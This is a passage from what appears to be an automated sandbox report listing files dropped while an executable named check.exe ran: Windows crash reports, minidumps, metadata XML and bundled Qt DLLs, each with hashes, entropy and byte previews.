SSDEEP:	192:FTfIci0PRjijoR3z8sJBJ9VywIZW7ICgBV6HfEQ9Gqwn2RImF+rV4rv1SnYzuiFq:RIcpPRjij8HwnA/RzuiF0Y4lO89X
MD5:	B7465CE8E7564214122AF5EDD168EEF0
SHA1:	D620C185ADE0E01470DF03739857CA961E68409E
SHA-256:	07350D3F35DFCFEB77A8D1A0BEDADF8058C84EBD00904253D3C420502A9D816C
SHA-512:	10DD223888120D391A498DF50B493417865EE218236FE6F5565C585592781274F763344D6811FD2DFD45C0BEB5FB875327285C3FEB9594D5DE487C2C088BC8FE
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.3.2.0.6.4.0.2.8.6.5.8.1.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.3.2.0.6.4.1.8.1.7.8.2.3.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.d.1.4.b.4.4.a.-.5.8.4.f.-.4.f.c.5.-.a.9.4.9.-.d.d.7.1.5.1.3.0.9.e.0.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.1.4.c.1.3.5.1.-.b.5.5.1.-.4.d.3.a.-.8.f.2.4.-.7.1.1.2.d.8.b.4.7.1.4.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.e.c.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.3.f.0.-.0.0.0.1.-.0.0.1.5.-.5.a.a.4.-.b.2.0.5.1.e.4.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.b.1.a.f.4.6.6.8.3.f.b.2.3.d.a.2.6.a.4.8.5.2.8.1.6.7.c.0.9.2.2.0.0.0.0.f.f.f.f.!.0.0.0.0.d.2.9.1.7.2.1.f.2.c.c.3.c.6.4.6.2.6.7.e.f.8.f.c.5.1.6.3.3.5.7.f.3.c.e.9.7.8.f.0.!.c.h.e.c.k...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.2././.0.9.:.0.9.:.5.4.:.4.7.!.2.4.f.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_check.exe_b144984def4d33843c3348cb5ac9d7933b983_17fc3fad_ec1ec674-1875-4f20-ac76-9f80f62308eb\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.3682742349586619
Encrypted:	false
SSDEEP:	192:ZPAGIqi0PRjijoR3tCy37lTLsBRyt728+fLAHxaOzI0wn2vIobglV4lv1SnYzui0:Z9IqpPRjijcfwnuRRzuiF0Y4lO89X
MD5:	886571FB23B266AB6D57E266B752DED5
SHA1:	9F14002CFD8BE743A51D424B09CA7355D32C61F2
SHA-256:	A8EC5D6D667587D3C18CCB80DEFA74BBF49F498DD449AAD72151CB38556C4783
SHA-512:	19071EF1C4E1611A8860013368A22D6F64636104A776CE8945FC3AAC9D55E3DB9C8CDB97F5AB9A62B28055FAAB75962E8728D36C6927249B1A9BECAD2959F631
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.3.2.0.6.6.0.2.0.4.1.6.8.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.3.2.0.6.6.1.3.7.6.1.2.4.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.c.1.e.c.6.7.4.-.1.8.7.5.-.4.f.2.0.-.a.c.7.6.-.9.f.8.0.f.6.2.3.0.8.e.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.f.1.2.f.1.c.4.-.6.1.5.5.-.4.f.8.f.-.8.3.6.8.-.5.2.d.e.f.a.5.6.5.5.1.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.e.c.k...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.4.4.-.0.0.0.1.-.0.0.1.5.-.e.a.2.d.-.f.b.1.3.1.e.4.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.b.1.a.f.4.6.6.8.3.f.b.2.3.d.a.2.6.a.4.8.5.2.8.1.6.7.c.0.9.2.2.0.0.0.0.f.f.f.f.!.0.0.0.0.d.2.9.1.7.2.1.f.2.c.c.3.c.6.4.6.2.6.7.e.f.8.f.c.5.1.6.3.3.5.7.f.3.c.e.9.7.8.f.0.!.c.h.e.c.k...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.2././.0.9.:.0.9.:.5.4.:.4.7.!.2.4.f.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5570.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Dec 10 16:10:41 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	134794
Entropy (8bit):	2.0252482739036815
Encrypted:	false
SSDEEP:	768:a9pQurkihforWrGzIa/E4v9Aou9KwYdSADCn+lDs:emihwCgvu9KwSDq+ts
MD5:	D1885BCAD366099BBF96E91696EFA24F
SHA1:	458A8D5389051B0C74017BE76199F982B4D2EC86
SHA-256:	4DBFFA48F30D8B224B1ED3FC41DADED426AE8C77F965C5D68063008AA02E6083
SHA-512:	1697BE747B49CBAB874AEA60BAB3D2843E94F4F919E119184C53AF8CEE063E7A8D19F733A39E094449A20188420CD9F4B170BDFEC674808C76D847307EBD180B
Malicious:	false
Reputation:	unknown
Preview:	MDMP..a..... ........hXg............$............%..8.......$....-......$....\..........`.......8...........T............%...............-.........../..............................................................................eJ......p0......Lw......................T............gXg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER58AD.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	9352
Entropy (8bit):	3.7054922316249823
Encrypted:	false
SSDEEP:	192:R6l7wVeJMPz++6YzJ0jcgmfCBwpDB89bvIsfLlm:R6lXJM756Yd0jcgmfCVvbfk
MD5:	EE51199F2C6046389CA3DA3553B063A0
SHA1:	13A3FD400D55642EA73BCED2BFEFB1CECD2EB28F
SHA-256:	B1B52FA2A1458C3F0BD743203654F890DBDAD857F9EB79360E7B24E5F6292416
SHA-512:	39D43D124B9A6EF576804C8BF1701267028216326EF2D4142622251D5150172EB03D3985D57182FD858F69EFCDF21496DD6D6669D30DE18C66831EDF72E1ECD4
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.0.0.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER58FC.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4734
Entropy (8bit):	4.4346968292648254
Encrypted:	false
SSDEEP:	48:cvIwWl8zsOJg771I9Y7WpW8VYEYm8M4JbWDFbyq8vuW4nMZDQcSOd:uIjfEI7fK7VYJSlW3CMlCOd
MD5:	31D1A3607B7394CA67F5B39C72AD8249
SHA1:	5075001C2C733D6B0551665B1C7850245A0239B2
SHA-256:	C29CCA9CFD4F9E212F1D4AFD5AFB60E60FB2C3FF286EA550C7D70722E0A9D80B
SHA-512:	F18E6091A8589D6C5325B4A230E4779C04A75FC5D2C4F395AF4BBFCB39B760CE42AF2DA80A9E11B97EC83C627A80830152B9350D5272B2C4033F407C10CEA670
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="625393" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8385.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Dec 10 16:10:52 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	132630
Entropy (8bit):	2.052887330390077
Encrypted:	false
SSDEEP:	384:Sqy98nurHkVC3aUtNb8M1IvQNIlWSkLb4JLign3nSVNlAC7AD5OwelvjApyp3vCK:29GurEiWiIlWS+b4JLigiAOCmjA4/J
MD5:	D5AF17F07FC45DC0620D55445A49234D
SHA1:	46B404F63FBC41C661AA06F8381C1BE692AFCACC
SHA-256:	C2B137C0199585883C48A5F8053B24277ED00F350AF7FB8408E551EB9D1E473A
SHA-512:	4E57A4B97FAC1159E2AECB912161FE6543592FEBCDBCC116236DBD6ACA31F875E9FE36A91EA95B0CBD934AB7E9684A35F34D590CAB11EB165FB1D06B4A3C191C
Malicious:	false
Reputation:	unknown
Preview:	MDMP..a..... ........hXg............$............%..8.......$....-...........\..........`.......8...........T...........X&...............-.........../..............................................................................eJ......p0......Lw......................T.......0....gXg............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER858A.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	9352
Entropy (8bit):	3.7034800821081797
Encrypted:	false
SSDEEP:	192:R6l7wVeJLOsUYBe6YykA3D4gmfCBwpD789blJRlgDfc3m:R6lXJZ86YhmD4gmfC3lJRyDfx
MD5:	8B239ED26F8FE8E632F78B34DFCB2ACB
SHA1:	45C40C52B3D9F127D46ECA6B4DC56F0CEDAE2A0F
SHA-256:	516326FB50334E49748CC05B019FA0FD220C75B9E7393BD47F13573E417ED15E
SHA-512:	361C9098CE4C003B8D5E23491C244435D30A3274AE76B53398558D3BAEBF55437D727DEC63B73A679C192330B95533D941B68E11DC0E239E43169A4C1A84982E
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.0.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER85F8.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4734
Entropy (8bit):	4.433385228957165
Encrypted:	false
SSDEEP:	48:cvIwWl8zsOJg771I9Y7WpW8VYiqYm8M4JbWDF2yq8vuWoMZDQcSTd:uIjfEI7fK7V7DJSgW3oMlCTd
MD5:	67BAFD4AE4C9FE33367097BF0CF2AFA3
SHA1:	95C677F5D3FC79E2B38FB292BC1381C3026AC356
SHA-256:	5B4BE1DC6EF7C298C4AA51EADB714CCF1BA29B5C7BB8590BC5AC816B114E29CB
SHA-512:	E3234063770B03CDC2F50A5F263AE6BF9432C2F9012C212DD2000D34AFEE616DF2F297F0D0D6504082D25689F2E749C4429016A0C59AEFC950D8A50C49AB695B
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="625393" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA313.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Dec 10 16:11:00 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	131942
Entropy (8bit):	2.055871379131054
Encrypted:	false
SSDEEP:	768:29uiyurEiugWizF8eAykRBEwLJwqQSe+CA8iq:tiugFzF8nykRBEsJwqnCAjq
MD5:	CA766289911239A2F4A9C528658CAD50
SHA1:	2581B0027F2B87A97FFEE2C092C9883386B566F2
SHA-256:	302354B87562228AF81FC01C3D351A5C3E736AE3C6FB187A65D6962F4D434DCF
SHA-512:	58389F8FE0728F1C1920453FA8DAD94C21418E879AB7BA84626AD9176FFA38E97B197A4A0247C5B267759B353F8A6681D4D0EE208B269E04ADEE967803DDF77F
Malicious:	false
Reputation:	unknown
Preview:	MDMP..a..... ........hXg............$............%..8.......$....-...........\..........`.......8...........T...........X&...............-.........../..............................................................................eJ......p0......Lw......................T.......D....hXg............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA3DF.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	9600
Entropy (8bit):	3.705978709895797
Encrypted:	false
SSDEEP:	192:R6l7wVeJAI+N6YtgcD4gmfCBwpDG89bTICfkxm:R6lXJP66YqcD4gmfCkTFf/
MD5:	D46FAD18376EEC42C8755BE907DF8989
SHA1:	7D7403E50355010976B694651F69CEAF03BDC8AB
SHA-256:	35B8D2F62D2EBA67AB096D3A81C352E7C25BAF3A1A98093E3CBF62AC330A986D
SHA-512:	302204FBCB41A4C82A6B8344FA0A1CDE10B4E690C62E115F090D9682EB933E03D59C97203207E2C4774436365BEE59385B60445A276DD0C4B7145E471EA37D47
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.2.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA43E.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4735
Entropy (8bit):	4.436366072358201
Encrypted:	false
SSDEEP:	48:cvIwWl8zsOJg771I9Y7WpW8VYmoYm8M4JbWDFkyq8vuW1MZDQcSId:uIjfEI7fK7VbJSCW31MlCId
MD5:	EAA30B44DBFD658C8A618841BDB07B2C
SHA1:	8FC4BD3FA471DB18AC3E827CA5E9C9EFBF0A6059
SHA-256:	DC18BC52F85607A208EFF5C6D62A9F42A115A37FBD2FEF0E92A2BD9EE9DAE13C
SHA-512:	3555113EAB83FAF0073189D61EC4F6481E7B58192C4A9952085B6DA1B6AEE6AC5D43B460FB5F525510F6D47E291559552D3786DCA0AFE6AF524B324E8726BA3F
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="625393" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1464
Entropy (8bit):	5.324933237588891
Encrypted:	false
SSDEEP:	24:3YSKco4KmBs4RPT6BmFoUe7u1omjKcm9qr9txNBJt/NKwJ0hNuTx9r8Hv9ILAl/:ISU4y4RQmFoUeCamfm9qr9trBLNGhNuw
MD5:	1EF85381D5E5B96640024242093BBA5A
SHA1:	3CABAFA2BF1AEBF2CC00AC90F371AFF734738B83
SHA-256:	C535B7D792F49442F8B3CF81D9C97BDFB3CBDED25BF6D1DFD9B7D3E6A59E23DC
SHA-512:	E039941E7C96802A66D920BBFA3F6E9CD2BB9EC7A2AC9B2BAD690310A0AF64F3B899751244DEABA2710E9A6341EA683CCA5F87D860D6AB4DACFC78D63DA2FAEE
Malicious:	false
Reputation:	unknown
Preview:	@...e...........)....................................@..........@...............\|.jdY\.H.s9.!..\|(.......System.IO.Compression...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P................1]...E...........(.Microsoft.PowerShell.Commands.Management

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\MSVCP140.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	590112
Entropy (8bit):	6.461874649448891
Encrypted:	false
SSDEEP:	12288:xI88L4Wu4+oJ+xc39ax5Ms4ETs3rxSvYcRkdQEKZm+jWodEEVh51:xD89rxZfQEKZm+jWodEEP5
MD5:	01B946A2EDC5CC166DE018DBB754B69C
SHA1:	DBE09B7B9AB2D1A61EF63395111D2EB9B04F0A46
SHA-256:	88F55D86B50B0A7E55E71AD2D8F7552146BA26E927230DAF2E26AD3A971973C5
SHA-512:	65DC3F32FAF30E62DFDECB72775DF870AF4C3A32A0BF576ED1AAAE4B16AC6897B62B19E01DC2BF46F46FBE3F475C061F79CBE987EDA583FEE1817070779860E5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........LS..-=..-=..-=.....-=..U...-=..-<.k-=.gB<..-=.gB9..-=.gB>..-=.gB8.=-=.gB=..-=.gB..-=.gB?..-=.Rich.-=.........PE..d.....t^.........." .....@..........."...............................................z....`A.........................................j..h....D..,...............L;...... A......(...@...8...............................0............P.......f..@....................text...,>.......@.................. ..`.rdata..r....P.......D..............@..@.data....:...`..."...N..............@....pdata..L;.......<...p..............@..@.didat..h...........................@....rsrc...............................@..@.reloc..(...........................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\MSVCP140_1.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	31728
Entropy (8bit):	6.499754548353504
Encrypted:	false
SSDEEP:	384:rOY/H1SbuIqnX8ndnWc95gW3C8c+pBj0HRN7bULkcyHRN7rxTO6iuQl9xiv:yYIBqnMdxxWd4urv
MD5:	0FE6D52EB94C848FE258DC0EC9FF4C11
SHA1:	95CC74C64AB80785F3893D61A73B8A958D24DA29
SHA-256:	446C48C1224C289BD3080087FE15D6759416D64F4136ADDF30086ABD5415D83F
SHA-512:	C39A134210E314627B0F2072F4FFC9B2CE060D44D3365D11D8C1FE908B3B9403EBDD6F33E67D556BD052338D0ED3D5F16B54D628E8290FD3A155F55D36019A86
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>.{.zl..zl..zl......xl..s...~l.....}l.....xl..zl..Ql......l.....il.....{l.....{l.....{l..Richzl..................PE..d.....t^.........." .........$......p.....................................................`A........................................p>..L....?..x....p.......`..X....:...A......p...P3..8............................3..0............0..@............................text............................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata..X....`.......0..............@..@.rsrc........p.......4..............@..@.reloc..p............8..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5Core.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6023664
Entropy (8bit):	6.768988071491288
Encrypted:	false
SSDEEP:	98304:hcirJylHYab/6bMJsv6tWKFdu9CLiZxqfg8gwf:+irJylHFb/QMJsv6tWKFdu9CL4xqfg8x
MD5:	817520432A42EFA345B2D97F5C24510E
SHA1:	FEA7B9C61569D7E76AF5EFFD726B7FF6147961E5
SHA-256:	8D2FF4CE9096DDCCC4F4CD62C2E41FC854CFD1B0D6E8D296645A7F5FD4AE565A
SHA-512:	8673B26EC5421FCE8E23ADF720DE5690673BB4CE6116CB44EBCC61BBBEF12C0AD286DFD675EDBED5D8D000EFD7609C81AAE4533180CF4EC9CD5316E7028F7441
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......D.............................UJ......................................................W.....,..................r....................Rich............PE..d...;._.........." ..........-.......-......................................`\.....x.\...`...........................................L..O....T...... \.......U.. ....[......0\..%..,.H.T.....................H.(.....H.0............./.H............................text............................... ..`.rdata..F7%.../..8%.................@..@.data...x....PT..\...6T.............@....pdata... ....U.."....T.............@..@.qtmimed.....0W.......V.............@..P.rsrc........ \.......[.............@..@.reloc...%...0\..&....[.............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI57162\PyQt5\Qt5\bin\Qt5DBus.dll

Download File

Process:	C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	436720
Entropy (8bit):	6.392610185061176
Encrypted:	false
